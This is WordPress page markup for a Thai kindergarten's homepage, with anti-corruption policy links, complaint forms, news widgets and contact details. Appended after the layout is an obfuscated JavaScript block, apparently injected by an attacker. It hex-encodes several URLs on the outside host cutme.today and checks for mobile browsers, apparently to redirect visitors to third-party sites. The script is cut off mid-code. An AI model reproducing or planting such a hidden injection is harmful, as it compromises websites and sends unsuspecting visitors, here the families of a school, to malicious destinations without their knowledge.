-->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 